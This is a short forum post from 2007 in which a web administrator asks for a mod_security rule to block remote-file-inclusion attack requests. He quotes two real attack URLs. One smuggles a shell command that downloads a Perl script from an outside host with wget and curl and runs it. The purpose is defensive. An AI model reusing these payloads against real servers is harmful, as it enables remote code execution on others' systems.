Mod_security Rule Assistance - Prevent SPAM

**Sash** · 04-24-2007 10:24 PM

Hello,

Does anyone have a mod_security rule that will block these types of exploits.....?

http://www.domain.com/index.php?d=http://att4ck3d.xpg.com.br/cmd.txt?&action=cmd&chdir=/tmp

http://www.domain.com/index.php?d=http://teampcc10.ooblez.com/tool25.txt?&cmd=cd%20/tmp%20;%20killall%20-9%20perl%20;%20killall%20-9%20perl5.8.8%20;%20wget%20http://teampcc10.ooblez.com/sess_0101.txt%20;%20lynx%20http://teampcc10.ooblez.com/sess_0101.txt%20;%20curl%20-o%20sess_0101.txt%20http://teampcc10.ooblez.com/sess_0101.txt%20;%20perl%20sess_0101.txt

A rule that would prevent people from loading a file from an external URL would be great.

Thanks,
MIke

**Angel78** · 04-25-2007 08:34 AM

LinkBack

Thread Tools

Mod_security Rule Assistance - Prevent SPAM

problem with the RBL rule in Mod_security

mod_security 2.1.4 and the latest rule set (1.5.1)

Add Rule to Mod_security useragents.conf ?

mod_security rule